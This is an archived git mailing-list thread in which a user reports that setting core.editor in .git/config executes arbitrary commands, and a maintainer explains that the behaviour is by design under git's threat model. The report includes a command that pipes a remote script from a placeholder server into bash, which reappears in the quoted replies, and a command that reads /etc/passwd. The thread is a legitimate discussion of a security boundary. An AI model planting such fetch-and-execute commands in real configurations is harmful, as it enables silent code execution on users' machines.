* Git vulnerability - execution of arbitrary code through .git/conf
@ 2018-08-26 2:13 Leo Silva (a.k.a kirotawa)
2018-08-26 3:19 ` Jeff King
0 siblings, 1 reply; 3+ messages in thread
From: Leo Silva (a.k.a kirotawa) @ 2018-08-26 2:13 UTC (permalink / raw)
To: git
Hi git community!
I found what seems to be a vulnerability/bug on git. I'm running
version 2.7.4 on Ubuntu xenial, but also tested with last version
2.19.0.rc0.2.g29d9e3e.
The steps to reproduce are:
1. open your .git/conf
2. add something like:
[core]
editor = ls /etc/passwd
or even
editor = curl -s http://server/path/malicious-script.sh | bash -s
3. run: git commit
A malicious user/repo can set some code through URL or even as command
in .git/conf and take control of your machine or silently run
malicious code.
[]'s
--
----------------------------------------------
Leônidas S. Barbosa (Kirotawa)
blog: corecode.wordpress.com
---------------------------------------------
"O que importa são os incontáveis pequenos atos de pessoas
desconhecidas, que fundam as bases para os eventos significativos que
se tornam história" - Howard Zinn
^ permalink raw reply [flat|nested] 3+ messages in thread
* Re: Git vulnerability - execution of arbitrary code through .git/conf
2018-08-26 2:13 Git vulnerability - execution of arbitrary code through .git/conf Leo Silva (a.k.a kirotawa)
@ 2018-08-26 3:19 ` Jeff King
2018-08-26 3:25 ` Leo Silva (a.k.a kirotawa)
0 siblings, 1 reply; 3+ messages in thread
From: Jeff King @ 2018-08-26 3:19 UTC (permalink / raw)
To: Leo Silva (a.k.a kirotawa); +Cc: git
On Sat, Aug 25, 2018 at 11:13:30PM -0300, Leo Silva (a.k.a kirotawa) wrote:
> Hi git community!
>
> I found what seems to be a vulnerability/bug on git. I'm running
> version 2.7.4 on Ubuntu xenial, but also tested with last version
> 2.19.0.rc0.2.g29d9e3e.
>
> The steps to reproduce are:
>
> 1. open your .git/conf
> 2. add something like:
> [core]
> editor = ls /etc/passwd
> or even
> editor = curl -s http://server/path/malicious-script.sh | bash -s
> 3. run: git commit
>
> A malicious user/repo can set some code through URL or even as command
> in .git/conf and take control of your machine or silently run
> malicious code.
This is all working as designed. There are many ways you can execute
arbitrary code by changing files in in a .git directory. As you noticed,
core.editor is one. pager.* is another one, as are hooks in .git/hooks.
Our threat model is that the files in .git are trusted, and should be
protected through normal filesystem permissions. An important part of
that model is that a "git clone" does not copy arbitrary .git files from
the other side (only objects and refs). If you find a way around that,
it would be a problem (and in fact many of the vulnerabilities we've had
have involved somehow writing into .git from the checked-out tree).
-Peff
^ permalink raw reply [flat|nested] 3+ messages in thread
* Re: Git vulnerability - execution of arbitrary code through .git/conf
2018-08-26 3:19 ` Jeff King
@ 2018-08-26 3:25 ` Leo Silva (a.k.a kirotawa)
0 siblings, 0 replies; 3+ messages in thread
From: Leo Silva (a.k.a kirotawa) @ 2018-08-26 3:25 UTC (permalink / raw)
To: peff; +Cc: git
ah, cool!
So, when a git clone is executed it generates a new .git/config to the
local one (I didn't pay attention on that).
Thanks a lot for the clarification Peff!
On Sun, Aug 26, 2018 at 12:19 AM Jeff King <peff@peff.net> wrote:
>
> On Sat, Aug 25, 2018 at 11:13:30PM -0300, Leo Silva (a.k.a kirotawa) wrote:
>
> > Hi git community!
> >
> > I found what seems to be a vulnerability/bug on git. I'm running
> > version 2.7.4 on Ubuntu xenial, but also tested with last version
> > 2.19.0.rc0.2.g29d9e3e.
> >
> > The steps to reproduce are:
> >
> > 1. open your .git/conf
> > 2. add something like:
> > [core]
> > editor = ls /etc/passwd
> > or even
> > editor = curl -s http://server/path/malicious-script.sh | bash -s
> > 3. run: git commit
> >
> > A malicious user/repo can set some code through URL or even as command
> > in .git/conf and take control of your machine or silently run
> > malicious code.
>
> This is all working as designed. There are many ways you can execute
> arbitrary code by changing files in in a .git directory. As you noticed,
> core.editor is one. pager.* is another one, as are hooks in .git/hooks.
>
> Our threat model is that the files in .git are trusted, and should be
> protected through normal filesystem permissions. An important part of
> that model is that a "git clone" does not copy arbitrary .git files from
> the other side (only objects and refs). If you find a way around that,
> it would be a problem (and in fact many of the vulnerabilities we've had
> have involved somehow writing into .git from the checked-out tree).
>
> -Peff
--
----------------------------------------------
Leônidas S. Barbosa (Kirotawa)
Security Engineer at Canonical Ltd
blog: corecode.wordpress.com
---------------------------------------------
"O que importa são os incontáveis pequenos atos de pessoas
desconhecidas, que fundam as bases para os eventos significativos que
se tornam história" - Howard Zinn
^ permalink raw reply [flat|nested] 3+ messages in thread
end of thread, other threads:[~2018-08-26 3:26 UTC | newest]
Thread overview: 3+ messages (download: mbox.gz / follow: Atom feed)
-- links below jump to the message on this page --
2018-08-26 2:13 Git vulnerability - execution of arbitrary code through .git/conf Leo Silva (a.k.a kirotawa)
2018-08-26 3:19 ` Jeff King
2018-08-26 3:25 ` Leo Silva (a.k.a kirotawa)
Code repositories for project(s) associated with this public inbox
https://80x24.org/mirrors/git.git
This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox;
as well as URLs for read-only IMAP folder(s) and NNTP newsgroup(s).